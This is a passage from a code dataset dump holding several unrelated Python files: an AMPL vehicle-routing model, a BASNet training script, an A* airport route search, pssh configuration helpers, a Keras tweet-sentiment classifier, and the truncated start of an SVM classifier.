self.run_clarke_wright(self.data)\n\t\telse:\n\t\t\traise ValueError(\"algorithmType is invalid: {0}\".format(algorithmType))\n\n\t\t# Run AMPL model for each car separately\n\t\tresults = []\n\t\tfor (car_id, cities) in result:\n\n\t\t\tif self.verbose:\n\t\t\t\tprint('\\nCAR {0}:'.format(car_id))\n\n\t\t\t# Get subset of the data and run AMPL model\n\t\t\tdata_subset = self.get_data_subset(self.data, car_id, cities)\n\t\t\tampl = self.run_ampl_model(data_subset)\n\n\t\t\tresult = self.collectResult(car_id, ampl, cities)\n\t\t\tresults.append(result)\n\n\t\t\tif self.verbose:\n\t\t\t\tprint(result)\n\n\t\tsimplified_demand = self.get_simplified_demand(self.data.demand, self.data.volumes)\n\t\tpoints = np.append(self.data.coordinates, simplified_demand, axis=1)\n\n\t\treturn results, points\n\n\tdef print_scalar_param(self, file, param, name):\n\t\tfile.write(b'param {0} := {1};'.format(name, param))\n\n\tdef print_1d_param(self, file, param, name):\n\n\t\t# Write header\n\t\tfile.write(b'param {0} :=\\n'.format(name))\n\n\t\t# Write data rows\n\t\tfor idx, elem in enumerate(param):\n\t\t\tif isinstance(elem, basestring):\n\t\t\t\tfile.write(b'{0} \"{1}\"'.format(idx + 1, elem))\n\t\t\telse:\n\t\t\t\tfile.write(b'{0} {1}'.format(idx + 1, elem))\n\t\t\tif idx == (param.shape[0] - 1):\n\t\t\t\tfile.write(b';')\n\t\t\tfile.write(b'\\n')\n\n\tdef print_2d_param(self, file, param, name):\n\n\t\t# Write header\n\t\tfile.write(b'param {0} : '.format(name))\n\t\tfor i in range(0, param.shape[1]):\n\t\t\tfile.write(b'{0} '.format(i + 1))\n\t\tfile.write(b':=\\n')\n\n\t\t# Write data rows\n\t\tfor idx, row in enumerate(param):\n\t\t\tfile.write(b'{0} '.format(idx + 1))\n\t\t\tfor elem in row:\n\t\t\t\tfile.write(b'{0} '.format(elem))\n\t\t\tif idx == (param.shape[0] - 1):\n\t\t\t\tfile.write(b';')\n\t\t\tfile.write(b'\\n')\n\n\tdef write_data_to_temp_file(self, tmp_file, data):\n\t\tself.print_2d_param(tmp_file, data.demand, 'POPYT')\n\t\tself.print_2d_param(tmp_file, data.prices, 'CENA')\n\t\tself.print_2d_param(tmp_file, data.roads, 'DROGI')\n\t\tself.print_2d_param(tmp_file, data.shortage_coeff, 'WAGA_NIEZADOWOLENIA')\n\t\tself.print_1d_param(tmp_file, data.supply, 'PODAZ')\n\t\tself.print_1d_param(tmp_file, data.volumes, 'OBJETOSC')\n\t\tself.print_1d_param(tmp_file, data.cities, ': punkty: miasta')\n\t\tself.print_1d_param(tmp_file, data.breadTypes, ': pieczywa: typy')\n\t\tself.print_scalar_param(tmp_file, 1, 'KOSZT_KIEROWCY')\n\t\tself.print_scalar_param(tmp_file, data.capacity, 'POJEMNOSC')\n\n\tdef generate_temp_data_file(self, data):\n\t\ttmp_file = tempfile.NamedTemporaryFile()\n\n\t\t# Fill with data\n\t\tself.write_data_to_temp_file(tmp_file, data)\n\t\tif self.verbose:\n\t\t\tprint('\\nDATA FILE:')\n\t\t\tself.write_data_to_temp_file(sys.stdout, data)\n\t\t\tprint('\\n')\n\n\t\t# Dirty hack\n\t\t# File will be already open while amplpy uses it, but we have to make sure\n\t\t# it is 'rewinded'\n\t\ttmp_file.seek(0)\n\n\t\treturn tmp_file\n\n\tdef run_ampl_model(self, data):\n\t\t# Intiialize AMPL choose solver and load model\n\t\tampl = AMPL()\n\t\tampl.eval('option solver cplex;')\n\t\tampl.read('model/ampl/model.mod')\n\n\t\t# Generate and load temporary data file\n\t\tdata_file = self.generate_temp_data_file(data)\n\t\tampl.readData(data_file.name)\n\t\tdata_file.close()\n\n\t\tampl.solve()\n\t\treturn ampl\n\n\tdef findPathInRoad(self, cities, road):\n\t\tpath = []\n\t\tcurrent_city = 0\n\t\twhile True:\n\t\t\tif current_city == 0 and len(path) > 0:\n\t\t\t\tbreak\n\t\t\tpath.append(current_city)\n\t\t\trow = road[current_city, :]\n\t\t\tfor idx, elem in enumerate(row):\n\t\t\t\tif elem > 0:\n\t\t\t\t\tcurrent_city = idx\n\t\t\t\t\tbreak\n\n\t\treturn cities[path]\n\n\tdef calculateIncome(self, ampl):\n\t\tsold = np.array(ampl.getVariable('SPRZEDAZ').getValues().toPandas().as_matrix())\n\t\tprice = np.array(ampl.getParameter('CENA').getValues().toPandas().as_matrix())\n\t\tincome_per_city = np.multiply(sold, price)\n\n\t\treturn np.transpose(income_per_city)\n\n\tdef calculateTotalIncome(self, income):\n\t\ttotalIncome = np.sum(income)\n\t\treturn totalIncome\n\n\tdef calculateCapacityUsed(self, capacity, sales):\n\t\tsalesTotal = 0\n\t\tfor inCitySales in sales:\n\t\t\tsalesTotal += np.sum(inCitySales)\n\t\tcapacityUsed = (salesTotal / capacity) * 100\n\t\treturn capacityUsed\n\n\tdef collectResult(self, id, ampl, cities):\n\t\tnum_of_cities = len(cities)\n\n\t\tcargo = self.get_np_array_from_variable(ampl, 'ZABRANE')\n\t\tsales = self.get_np_array_from_variable(ampl, 'SPRZEDAZ', \n\t\t\tTrue, (num_of_cities, -1))\n\t\troad = self.get_np_array_from_variable(ampl, 'UZYCIE_DROGI', \n\t\t\tTrue, (num_of_cities, num_of_cities))\n\t\tpath = self.findPathInRoad(cities, road)\n\t\tincome = self.calculateIncome(ampl).reshape(num_of_cities, -1)\n\t\ttotalIncome = self.calculateTotalIncome(income)\n\t\tcapacityUsed = self.calculateCapacityUsed(self.data.capacity[id], sales)\n\t\tresult = Model.Result(id, cargo, sales, road, path, income, totalIncome, capacityUsed);\n\t\treturn result\n\n\tdef get_np_array_from_variable(self, ampl, name, two_dim=False, shape=(-1, 1)):\n\t\ttmp = np.transpose(ampl.getVariable(name).getValues().toPandas().as_matrix())\n\t\tif two_dim:\n\t\t\ttmp = np.reshape(tmp, shape)\n\t\treturn tmp\n\n\tclass Struct(object): pass\n\n\tdef load_data(self, data_dir):\n\n\t\t# Load numerical data\n\t\tdata = Model.Struct()\n\t\tdata.demand = np.genfromtxt('{0}/demand'.format(data_dir), delimiter=\",\")\n\t\tdata.supply = np.genfromtxt('{0}/supply'.format(data_dir), delimiter=\",\")\n\t\tdata.prices = np.genfromtxt('{0}/prices'.format(data_dir), delimiter=\",\")\n\t\tdata.roads = np.genfromtxt('{0}/roads'.format(data_dir), delimiter=\",\")\n\t\tdata.shortage_coeff = np.genfromtxt('{0}/shortage_coeff'.format(data_dir), delimiter=\",\")\n\t\tdata.capacity = np.genfromtxt('{0}/capacity'.format(data_dir), delimiter=\",\")\n\t\tdata.volumes = np.genfromtxt('{0}/volumes'.format(data_dir), delimiter=\",\")\n\t\tdata.coordinates = np.genfromtxt('{0}/coordinates'.format(data_dir), delimiter=\",\")\n\t\t# Load textual data\n\t\tdata.cities = np.array([line.rstrip('\\n') for line in open('{0}/cities'.format(data_dir))])\n\t\tdata.breadTypes = np.array([line.rstrip('\\n') for line in open('{0}/types'.format(data_dir))])\n\t\tdata.citiesTotal = len(data.cities)\n\t\tdata.carsTotal = len(data.capacity)\n\t\treturn data\n\n\t# Calculates simplified demand as total volume of products needed to fulfill\n\t# the demand\n\tdef get_simplified_demand(self, demand, volumes):\n\n\t\tsimplified_demand = np.zeros((demand.shape[0], 1))\n\n\t\tfor idx0, row in enumerate(demand):\n\t\t\toverall_volume = 0\n\t\t\tfor idx1, elem in enumerate(row):\n\t\t\t\toverall_volume += elem * volumes[idx1]\n\t\t\tsimplified_demand[idx0] = overall_volume\n\n\t\treturn simplified_demand\n\n\tdef run_sweep(self, data):\n\n\t # Calculate simplified demand\n\t simplified_demand = self.get_simplified_demand(data.demand, data.volumes)\n\n\t # Get bakery coefficients\n\t depot_coordinates = (data.coordinates[0,0], data.coordinates[0,1])\n\n\t points = np.append(data.coordinates[1:, :], simplified_demand[1:], axis=1)\n\t (points, order, cars_used) = sweep(points, data.capacity, depot_coordinates)\n\n\t result = []\n\t for car_id in range(0, cars_used):\n\n\t # Generate list od cities/points belonging to this cluster\n\t cities = []\n\t for index, (_,_,_,_,id) in enumerate(points):\n\t if car_id == id:\n\t cities.append(index)\n\n\t # Get original IDs (before sorting)\n\t cities = order[cities]\n\n\t # Increase IDs by one and add bakery (it was removed earlier before\n\t #running SWEEP). Then sort indices\n\t cities = np.sort(np.append(0, np.add(cities, 1)))\n\n\t result.append((car_id, cities))\n\n\t return result\n\n\tdef run_clarke_wright(self, data):\n\n\t # Calculate simplified demand\n\t simplified_demand = self.get_simplified_demand(data.demand, data.volumes)\n\n\t capacity = data.capacity\n\t #if len(data.capacity) != 1:\n\t # print(\"Warning: Clarke Wright algorithm assumes equal capacities of all cars\")\n\t # capacity = data.capacity[0]\n\n\t result = clarke_wright(data.roads, simplified_demand, capacity)\n\n\t print('Result:\\n')\n\t print(result)\n\n\t return result\n\n\tdef get_data_subset(self, data, car_id, city_ids):\n\n\t\tdata_subset = deepcopy(data)\n\n\t\ttmp = data_subset.roads[city_ids,:]\n\t\tdata_subset.roads = tmp[:,city_ids]\n\n\t\tdata_subset.cities = data_subset.cities[city_ids]\n\t\tdata_subset.demand = data_subset.demand[city_ids]\n\t\tdata_subset.prices = data_subset.prices[city_ids]\n\t\tdata_subset.shortage_coeff = data_subset.shortage_coeff[city_ids]\n\t\tdata_subset.capacity = data_subset.capacity[car_id]\n\t\tdata_subset.coordinates = data_subset.coordinates[city_ids]\n\n\t\treturn data_subset","sub_path":"app/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"383248451","text":"import torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torch.optim as optim\nimport torchvision.transforms as standard_transforms\n\nimport numpy as np\nimport glob\n\nfrom data_loader import Rescale\nfrom data_loader import RescaleT\nfrom data_loader import RandomCrop\nfrom data_loader import CenterCrop\nfrom data_loader import ToTensor\nfrom data_loader import ToTensorLab\nfrom data_loader import SalObjDataset\n\nfrom model import BASNet\n\nimport pytorch_ssim\nimport pytorch_iou\n\n# ------- 1. define loss function --------\n\nbce_loss = nn.BCELoss(size_average=True)\nssim_loss = pytorch_ssim.SSIM(window_size=11,size_average=True)\niou_loss = pytorch_iou.IOU(size_average=True)\n\ndef bce_ssim_loss(pred,target):\n\n\tbce_out = bce_loss(pred,target)\n\tssim_out = 1 - ssim_loss(pred,target)\n\tiou_out = iou_loss(pred,target)\n\n\tloss = bce_out + ssim_out + iou_out\n\n\treturn loss\n\ndef muti_bce_loss_fusion(d0, d1, d2, d3, d4, d5, d6, d7, labels_v):\n\n\tloss0 = bce_ssim_loss(d0,labels_v)\n\tloss1 = bce_ssim_loss(d1,labels_v)\n\tloss2 = bce_ssim_loss(d2,labels_v)\n\tloss3 = bce_ssim_loss(d3,labels_v)\n\tloss4 = bce_ssim_loss(d4,labels_v)\n\tloss5 = bce_ssim_loss(d5,labels_v)\n\tloss6 = bce_ssim_loss(d6,labels_v)\n\tloss7 = bce_ssim_loss(d7,labels_v)\n\t#ssim0 = 1 - ssim_loss(d0,labels_v)\n\n\t# iou0 = iou_loss(d0,labels_v)\n\t#loss = torch.pow(torch.mean(torch.abs(labels_v-d0)),2)*(5.0*loss0 + loss1 + loss2 + loss3 + loss4 + loss5) #+ 5.0*lossa\n\tloss = loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7#+ 5.0*lossa\n\tprint(\"l0: %3f, l1: %3f, l2: %3f, l3: %3f, l4: %3f, l5: %3f, l6: %3f\\n\"%(\n loss0.item(),\n loss1.item(),\n loss2.item(),\n loss3.item(),\n loss4.item(),\n loss5.item(),\n loss6.item()\n ))\n\t# print(\"BCE: l1:%3f, l2:%3f, l3:%3f, l4:%3f, l5:%3f, la:%3f, all:%3f\\n\"%(loss1.data[0],loss2.data[0],loss3.data[0],loss4.data[0],loss5.data[0],lossa.data[0],loss.data[0]))\n\n\treturn loss0, loss\n\n\n# ------- 2. set the directory of training dataset --------\n\ndata_dir = '/data/fangcheng.ji/datasets/human_segmentation'\ntra_image_dir = '/images/'\ntra_label_dir = '/masks/'\n\nmodel_dir = \"./saved_models/basnet_bsi/\"\nload_model_name = \"basnet_bsi_itr_6000_train_4.073827_tar_0.397622.pth\"\n\nwriter = SummaryWriter('./log')\n\nepoch_num = 100000\nbatch_size_train = 14\nbatch_size_val = 1\ntrain_num = 0\nval_num = 0\n\ntra_img_name_list = glob.glob(data_dir + tra_image_dir + '*')\ntra_lbl_name_list = [x.replace(tra_image_dir, tra_label_dir).replace('.' + x.split('.')[-1], '.png') \\\n for x in tra_img_name_list]\n\nprint(\"---\")\nprint(\"train images: \", len(tra_img_name_list))\nprint(\"train labels: \", len(tra_lbl_name_list))\nprint(\"---\")\n\ntrain_num = len(tra_img_name_list)\n\nsalobj_dataset = SalObjDataset(\n img_name_list=tra_img_name_list,\n lbl_name_list=tra_lbl_name_list,\n transform=transforms.Compose([\n RescaleT(256),\n RandomCrop(224),\n ToTensorLab(flag=0)]))\n\nsalobj_dataloader = DataLoader(\n salobj_dataset,\n batch_size=batch_size_train,\n shuffle=True,\n num_workers=8,\n pin_memory=True\n)\n\n# ------- 3. define model --------\n# define the net\nnet = BASNet(3, 1, device=\"cuda\")\nif load_model_name:\n print(f\"loading weight from {load_model_name}\")\n net.load_state_dict(torch.load(model_dir + load_model_name))\n\n# ------- 4. define optimizer --------\nprint(\"---define optimizer...\")\noptimizer = optim.Adam(net.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\n# ------- 5. training process --------\nprint(\"---start training...\")\nite_num = 6000\nite_num4val = 0\nrunning_loss = 0.0\nrunning_tar_loss = 0.0\n\nfor epoch in range(0, epoch_num):\n net.train()\n\n for i, data in enumerate(salobj_dataloader):\n ite_num = ite_num + 1\n ite_num4val = ite_num4val + 1\n\n inputs, labels = data['image'], data['label']\n\n inputs_v = inputs.to(net.device)\n labels_v = labels.to(net.device)\n\n # y zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n d0, d1, d2, d3, d4, d5, d6, d7 = net(inputs_v)\n loss2, loss = muti_bce_loss_fusion(d0, d1, d2, d3, d4, d5, d6, d7, labels_v)\n\n loss.backward()\n optimizer.step()\n\n # # print statistics\n running_loss += loss.item()\n running_tar_loss += loss2.item()\n\n # tensorboard writer\n writer.add_scalar(\"Loss/loss_d0\", loss2.item(), ite_num)\n writer.add_scalar(\"Loss/loss_total\", loss.item(), ite_num)\n\n writer.add_scalar(\"Loss/running_loss_mean\", running_loss / ite_num4val, ite_num)\n writer.add_scalar(\"Loss/tar_loss_mean\", running_tar_loss / ite_num4val, ite_num)\n\n # del temporary outputs and loss\n del d0, d1, d2, d3, d4, d5, d6, d7, loss2, loss\n\n print(\"[epoch: %3d/%3d, batch: %5d/%5d, ite: %d] train loss: %3f, tar: %3f \" % (\n epoch + 1,\n epoch_num,\n (i + 1) * batch_size_train,\n train_num,\n ite_num,\n running_loss / ite_num4val,\n running_tar_loss / ite_num4val\n ))\n\n if ite_num % 2000 == 0: # save model every 2000 iterations\n\n torch.save(net.state_dict(), model_dir + \"basnet_bsi_itr_%d_train_%3f_tar_%3f.pth\" % (ite_num, running_loss / ite_num4val, running_tar_loss / ite_num4val))\n running_loss = 0.0\n running_tar_loss = 0.0\n net.train() # resume train\n ite_num4val = 0\n\nprint('-------------Congratulations! Training Done!!!-------------')\n","sub_path":"basnet_train.py","file_name":"basnet_train.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217297411","text":"# Uniform Cost Search\n\n\n# sample graph \n\n# graph = {\n\t\n# \t'A': [['B', 10], ['C', 50]],\n# \t'B': [['A', 10], ['C', 20]],\n# \t'C': [['A', 50], ['B', 20], ['D', 420]],\n# \t'D': [['C', 420], ['E', 125]],\n# \t'E': [['D', 125]]\n# }\n\ngraphWithDirect = {\n\t\n\t'JFK': [['SFO', 2566], ['LAX', 2458], ['MSP', 1009], ['ORD', 720], ['CLT', 545], \n\t['ATL', 762], ['DFW', 1380], ['SLC', 1970], ['PHX', 2139], ['DTW', 485], ['SEA', 2397]],\n\t'SFO': [['JFK', 2566], ['LAX', 339], ['MSP', 1586], ['ORD', 1847], ['PHX', 652], \n\t['ATL', 2135], ['DFW', 1468], ['SLC', 599], ['DTW', 2083], ['SEA', 679]],\n\t'LAX': [['JFK', 2458], ['SFO', 339]],\n\t'MSP': [['JFK', 1009], ['SFO', 1586]],\n\t'ORD': [['JFK', 720], ['SFO', 1847], ['PHX', 1440]],\n\t'CLT': [['JFK', 545], ['SFO', 2292]],\n\t'ATL': [['JFK', 762], ['SFO', 2135]],\n\t'DFW': [['JFK', 762], ['SFO', 1468]],\n\t'SLC': [['JFK', 1970], ['SFO', 599]],\n\t'PHX': [['JFK', 2139], ['SFO', 652], ['ORD', 1440]],\n\t'DTW': [['JFK', 485], ['SFO', 2083]], \n\t'SEA': [['JFK', 2397], ['SFO', 679]]\n\n\n\n}\n\ngraphWithoutDirect = {\n\t\n\t'JFK': [['LAX', 2458], ['MSP', 1009], ['ORD', 720], ['CLT', 545], \n\t['ATL', 762], ['DFW', 1380], ['SLC', 1970], ['PHX', 2139], ['DTW', 485], ['SEA', 2397]],\n\t'SFO': [['LAX', 339], ['MSP', 1586], ['ORD', 1847], ['PHX', 652], \n\t['ATL', 2135], ['DFW', 1468], ['SLC', 599], ['DTW', 2083], ['SEA', 679]],\n\t'LAX': [['JFK', 2458], ['SFO', 339]],\n\t'MSP': [['JFK', 1009], ['SFO', 1586]],\n\t'ORD': [['JFK', 720], ['SFO', 1847], ['PHX', 1440]],\n\t'CLT': [['JFK', 545], ['SFO', 2292]],\n\t'ATL': [['JFK', 762], ['SFO', 2135]],\n\t'DFW': [['JFK', 762], ['SFO', 1468]],\n\t'SLC': [['JFK', 1970], ['SFO', 599]],\n\t'PHX': [['JFK', 2139], ['SFO', 652], ['ORD', 1440]],\n\t'DTW': [['JFK', 485], ['SFO', 2083]], \n\t'SEA': [['JFK', 2397], ['SFO', 679]]\n\n\n\n}\n\n\nstraight_line_distance_from_airport_to_SFO = {\n\t\n\t'JFK': 2581.21,\n\t'LAX': 337.9,\n\t'MSP': 1586.82,\n\t'ORD': 1843.15,\n\t'CLT': 2292.27,\n\t'ATL': 2134.8,\n\t'DFW': 1462.51,\n\t'SLC': 598.54,\n\t'PHX': 651.16,\n\t'DTW': 2075.12,\n\t'SEA': 679.36\n}\n\naverage_ticket_price_from_airport_to_SFO = {\n\t\n\t'JFK': 334,\n\t'LAX': 173,\n\t'MSP': 275,\n\t'ORD': 275,\n\t'CLT': 422,\n\t'ATL': 383,\n\t'DFW': 265,\n\t'SLC': 180,\n\t'PHX': 255,\n\t'DTW': 375,\n\t'SEA': 156\n}\n\n\n\ndef A_star_search(graph, start, goal):\n\tnode = start\n\n\t# initialize the cost\n\tcost = 0\n\n\tfrontier = []\n\n\t# create a list for all the frontier node\n\tfrontier_node_costs = []\n\n\tcount = 0\n\n\tstored_cost = 0\n\n\t# initialize a queue containing node only\n\tfrontier.append(node)\n\t#print(frontier)\n\t#print(len(frontier))\n\n\t# initialize a queeu containing the visited nodes\n\tvisited = []\n\n\t# keep track of the current_cost as the algorithm progresses\n\tcurrent_cost = 0\n\n\twhile True: \n\t\t\n\t\t# reset count\n\t\tcount = 0\n\t\t#print(len(frontier))\n\t\tif len(frontier) == 0:\n\t\t\tprint(\"Sorry, no path exists!\")\n\t\t\treturn \n\n\t\t# choose the lowest cost node from the frontier\n\t\tif len(frontier_node_costs) != 0:\n\n\t\t\tfirst_cost = frontier_node_costs[0] + straight_line_distance_from_airport_to_SFO[frontier[0]] \n\t\t\tprint(\"--- Stright Line Distance ---\")\n\t\t\tprint(straight_line_distance_from_airport_to_SFO[frontier[0]])\n\t\t\tprint(\"--- ---\")\n\t\t\tprint(\"--- First cost ---\")\n\t\t\tprint(first_cost)\n\t\t\tprint(\"--- ---\")\n\t\t\tindex = 1\n\t\t\tlowest_index = 0\n\t\t\tlowest_cost = first_cost\n\n\n\n\t\t\theuristic_cost = 0\n\n\t\t\t# need to calculate f(n) from cost and estimated cost to goal\n\t\t\tfor cost in frontier_node_costs[1:len(frontier_node_costs)]:\n\t\t\t\theuristic_cost = current_cost + cost + straight_line_distance_from_airport_to_SFO[frontier[index]] \n\t\t\t\t#print(straight_line_distance_from_A_to_D[frontier[index]])\n\t\t\t\tprint(\"--- Cost ---\")\n\t\t\t\tprint(cost)\n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tprint(\"--- Straight Line Distance + Avg. Ticket Price ---\")\n\t\t\t\tprint(straight_line_distance_from_airport_to_SFO[frontier[index]]) \n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tprint(\"--- Heuristic cost ---\")\n\t\t\t\tprint(heuristic_cost)\n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tif (heuristic_cost < lowest_cost):\n\t\t\t\t\tlowest_index = index\n\t\t\t\t\tlowest_cost = heuristic_cost\n\t\t\t\tindex += 1\n\t\t\tprint(\"--- Lowest index ---\")\n\t\t\tprint(lowest_index)\n\t\t\tprint(\"--- ---\")\n\t\t\tnode = frontier.pop(lowest_index)\n\n\t\t\t# update the current cost\n\t\t\tcurrent_cost += frontier_node_costs[lowest_index]\n\n\t\t\tprint(\"--- Current Cost ---\")\n\t\t\tprint(current_cost)\n\t\t\tprint(\"--- ---\")\n\t\telse:\n\t\t\tnode = frontier.pop()\n\n\t\n\n\t\tif node == goal:\n\t\t\tprint(\"You reached the goal!\")\n\t\t\treturn visited\n\t\t# add that node to the visited nodes queue\n\t\tvisited.append(node)\n\t\tprint(\"--- Visited ---\")\n\t\tprint(visited)\n\t\tprint(\"--- ---\")\n\t\t\n\n\t\t#for each of the node's neighbors n \n\t\tfor neighbor in graph[node]:\n\t\t\tprint(\"--- Neighbor ---\")\n\t\t\tprint(neighbor)\n\t\t\tprint(\"--- ---\")\n\n\t\t\t#if neighbor is goal, then we have reached it\n\t\t\t# we eliminate the case of moving further wehn we are done\n\t\t\tif neighbor[0] == goal:\n\t\t\t\tprint(\"You reached the goal!\")\n\t\t\t\tvisited.append(neighbor[0])\n\t\t\t\treturn visited\n\n\t\t\t# check that it is not in the visited\n\t\t\t# this prevents us from considering a node that we have already visited\n\t\t\tif neighbor[0] not in visited:\n\t\t\t\t# if this is the first iteration, add the node to the frontier\n\t\t\t\tif neighbor[0] not in frontier:\n\t\t\t\t\tfrontier.append(neighbor[0])\n\t\t\t\t\tfrontier_node_costs.append(neighbor[1])\n\t\t\t\t\tcost = neighbor[1]\n\t\t\t\telif cost > neighbor[1]:\n\t\t\t\t\tfrontier.pop()\n\t\t\t\t\tfrontier.append(neighbor[0])\n\t\t\t\t\tfrontier_node_costs.append(neighbor[1])\n\t\t\tprint(\"--- Frontier ---\")\n\t\t\tprint(frontier)\n\t\t\tprint(\"--- ---\") \n\t\t\t# increment counter\n\t\t\t#count = count + 1\n\nprint(A_star_search(graphWithoutDirect, 'JFK', 'SFO'))\n\t","sub_path":"A*-search.py","file_name":"A*-search.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449345396","text":"\"\"\"pssh utility wrappers.\"\"\"\n\nfrom pssh.exceptions import MissingKeyError\n\nfrom pssh.config import (\n load_configuration_file,\n extract_machine_hierarchy,\n get_user_configuration_path\n)\n\n\ndef list_machines(path_to_file):\n \"\"\"\n List machines.\n\n :param path_to_file Path to file (str?)\n :return Machine names (iterable)\n \"\"\"\n if not path_to_file:\n path_to_file = get_user_configuration_path()\n\n config = load_configuration_file(path_to_file)\n hierarchy = extract_machine_hierarchy(config)\n\n return hierarchy[\"machines\"].keys()\n\n\ndef get_machine_configuration(path_to_file, config_name):\n \"\"\"\n Get machine configuration.\n\n :param path_to_file Path to file (str?)\n :param config_name Config name (str):\n :return Machine configuration (dict)\n \"\"\"\n if not path_to_file:\n path_to_file = get_user_configuration_path()\n\n config = load_configuration_file(path_to_file)\n hierarchy = extract_machine_hierarchy(config)\n\n if config_name not in hierarchy[\"machines\"]:\n raise MissingKeyError(\n \"Missing `{0}` name in machines configuration.\".format(config_name))\n\n return hierarchy[\"machines\"][config_name]\n","sub_path":"pssh/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402837957","text":"# https://realpython.com/python-keras-text-classification/\nimport pandas as pd\nimport datetime as DT\nimport matplotlib.pyplot as plt\n\n\ntweets_file_location= ''\n#read in tweets\nnegative = pd.read_csv(tweets_file_location+'NEGATIVE_TWEET_FILE_NAME', sep = \";\")\nnegative['target'] = -1\npositive = pd.read_csv(tweets_file_location+'POSITIVE_TWEET_FILE_NAME', sep = \";\")\npositive['target'] = 1\n\nprint(len(positive))\nprint(len(negative))\n\n#Ideally we put these in a file to be read in both be the tweet collection code and the sentiment modelling code to reduce chance of inconsistenties\npositive_emoji = [\":)\", \":-)\", \":D\", \":-D\", \": )\"]\nnegative_emoji = [\":(\", \": (\", \":'(\"]\nall_emoji = positive_emoji+negative_emoji\n\n\ndb = positive.append(negative)\ndb.target.value_counts()\n\nngramrange = (1,3)\n\nimport re, nltk\n\n\nfrom nltk.stem.snowball import DutchStemmer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nnltk.download('punkt')\n\nstemmer = DutchStemmer(ignore_stopwords=False)\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n for item in tokens:\n stemmed.append(stemmer.stem(item))\n return stemmed\n\n\ndef tokenize(text):\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return stems\n\ntxt = db.text.tolist()\nclean_texts = [tokenize(text) for text in txt]\ndb['clean_text'] = clean_texts\n\ny = db.target.values\n\n\n#END OF DATA PREPROCESSING\n\n\n#BEGINNING OF MODELLING\n\n\nfrom keras.preprocessing.text import Tokenizer\n\nsentences = clean_texts\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(\n sentences, y, test_size=0.25, random_state=1000)\n\ntokenizer = Tokenizer(num_words=5000)\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\n\nvocab_size = len(tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index\n\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nmaxlen = 50\n\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\n\nfrom keras.models import Sequential\nfrom keras import layers\n\nembedding_dim = 150\n\nmodel = Sequential()\nmodel.add(layers.Embedding(input_dim=vocab_size,\n output_dim=embedding_dim,\n input_length=maxlen))\nmodel.add(layers.GlobalMaxPool1D())\nmodel.add(layers.Dense(10, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n#todo add tensorboard logging https://fizzylogic.nl/2017/05/08/monitor-progress-of-your-keras-based-neural-network-using-tensorboard/\n\nfrom keras.callbacks import TensorBoard\nfrom time import time\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n\nhistory = model.fit(X_train, y_train,\n epochs=20,\n verbose=1,\n validation_data=(X_test, y_test),\n batch_size=10,\n callbacks=[tensorboard])\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy))\nloss, accuracy = model.evaluate(X_test, y_test, verbose=False)\nprint(\"Testing Accuracy: {:.4f}\".format(accuracy))\n\n\ndef plot_history(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n x = range(1, len(acc) + 1)\n\n plt.figure(figsize=(12, 5))\n plt.subplot(1, 2, 1)\n plt.plot(x, acc, 'b', label='Training acc')\n plt.plot(x, val_acc, 'r', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n plt.subplot(1, 2, 2)\n plt.plot(x, loss, 'b', label='Training loss')\n plt.plot(x, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\nplot_history(history)\n","sub_path":"hlmos/src/self trained embedding.py","file_name":"self trained embedding.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"147787227","text":"from sklearn.externals import joblib\nimport re\nimport math\nimport os\nimport time\n\n\nclass SvcClassifition:\n #svm模型加载且预处理数据预测\n def __init__(self,model_path):\n self.model_path = model_path\n self.load_model()\n\n def load_model(self):\n self.clf = joblib.load(self.model_path)\n\n def get_sign(self,content):\n timepattern = re.compile(r'time:(.*?),source')\n sourcepattern = re.compile(r'source:(.*?),lon')\n lonpattern = re.compile(r'lon:(.*?),lat')\n latpattern = re.compile(r'lat:(.*?),thead')\n theadpattern = re.compile(r'thead:(.*?),sog')\n sogpattern = re.compile(r'sog:(.*?),cog')\n cogpattern = re.compile(r'cog:(.*?),status')\n time_date = re.findall(timepattern, content)[0]\n source = int(re.findall(sourcepattern, content)[0])\n lon = 